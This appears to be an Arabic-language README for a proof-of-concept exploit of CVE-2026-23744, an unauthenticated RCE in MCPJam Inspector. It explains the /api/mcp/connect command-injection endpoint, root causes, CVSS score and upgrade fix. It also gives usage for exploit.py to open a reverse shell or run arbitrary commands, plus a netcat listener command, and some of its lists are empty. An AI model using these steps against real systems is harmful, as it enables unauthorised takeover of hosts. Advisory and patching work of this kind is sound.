
CVE-2026-23744 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) حرجة دون مصادقة تؤثر على MCPJam Inspector ≤ 1.4.2. تنشأ المشكلة لأن Inspector يعرّض نقطة نهاية إدارية (/api/mcp/connect) تقبل إعدادات خادم MCP يتحكم فيها المستخدم ويمكن أن تؤدي إلى تنفيذ عمليات دون مصادقة كافية أو قيود أمنية. تستمع الإصدارات المتأثرة على 0.0.0.0 (جميع الواجهات) افتراضيًا بدلاً من localhost، مما يجعل الاستغلال عن بُعد ممكنًا إذا كانت الخدمة قابلة للوصول عبر الشبكة.
ترتبط الثغرة بنقطة النهاية التالية:
POST /api/mcp/connect
تقبل نقطة النهاية كائن JSON يحتوي على إعدادات خادم، مثل:
{
"serverConfig": {
"command": "<executable>",
"args": ["<arguments>"],
"env": {}
},
"serverId": "<identifier>"
}
يُستخدم هذا الإعداد المُقدَّم بعد ذلك بواسطة MCPJam Inspector لإنشاء وإدارة عملية خادم MCP جديدة. وبما أن نقطة النهاية تفتقر إلى مصادقة كافية وضوابط أمنية، يمكن للمهاجم إرسال تعريفات عمليات عشوائية يتم تنفيذها بواسطة خدمة Inspector.
في جوهرها، تعد هذه الثغرة مشكلة غياب المصادقة للوظائف الحرجة (CWE-306) حيث يعرّض التطبيق وظائف مخصصة للمستخدمين المحليين الموثوقين ويجعلها قابلة للوصول عبر الشبكة دون فحوصات أمنية كافية.
تنشأ الثغرة من عيبين في التصميم:
0.0.0.0 افتراضيًا.يمكن تصور مسار الهجوم الناتج على النحو التالي:
Attacker → /api/mcp/connect → Process Creation → Operating System
نظرًا لأن التطبيق يتفاعل مباشرة مع إنشاء عمليات نظام التشغيل، فإن الاستغلال الناجح يمكن أن يؤدي إلى تنفيذ أوامر عشوائية ضمن السياق الأمني لخدمة MCPJam Inspector.
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port>
-t (أو) --target: عنوان URL الهدف أو عنوان IP الهدف.-tport (أو) --target-port: منفذ الهدف للاتصال به، وهو في معظم الحالات 6274 لـ MCPJam Inspector. لا تستخدم هذه الوسيطة إذا كان MCPJam Inspector مستضافًا في مكان آخر، مثل نطاق فرعي أو مضيف افتراضي. استخدم بدلاً من ذلك الوسيطة -t لتحديد النطاق الفرعي أو المضيف الافتراضي.-lhost (أو) --local-host: عنوان IP العام للصدفة العكسية للاتصال به.-lport (أو) --local-port: المنفذ الذي سيُستخدم للصدفة العكسية.python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port> -c '<command>'
-c (أو) --command: الأمر المراد تنفيذه على الهدف.قبل استخدام هذا البرنامج، يجب أولاً تشغيل مستمع على جهازك المحلي باستخدام Netcat.
للقيام بذلك، استخدم الأمر التالي:
nc -lvnp <port>
ثم قم بتشغيل الأمر أعلاه للحصول على صدفة عكسية على الهدف.
قد يسمح الاستغلال الناجح للمهاجم بما يلي:
حصلت الثغرة على درجة CVSS v3.1 تبلغ 9.8 (حرجة) نظرًا لناقل الهجوم الشبكي، وغياب المصادقة، وعدم الحاجة لتفاعل المستخدم، والأثر الكبير على السرية والنزاهة والتوافر.
قم بالترقية فورًا إلى MCPJam Inspector 1.4.3 أو أحدث. تشمل الإجراءات الدفاعية الإضافية ما يلي:
هذا الاستغلال (PoC) لأغراض تعليمية وبحوث الأمن الدفاعي والاختبارات الأمنية المصرح بها فقط. يجب استخدامه فقط ضد الأنظمة التي لديك إذن صريح لاختبارها. قد يؤدي الاستخدام غير المصرح به ضد أنظمة طرف ثالث إلى انتهاك القوانين واللوائح المعمول بها. ليس مالك هذا المستودع مسؤولاً عن أي أضرار ناتجة عن استخدام هذا البرنامج.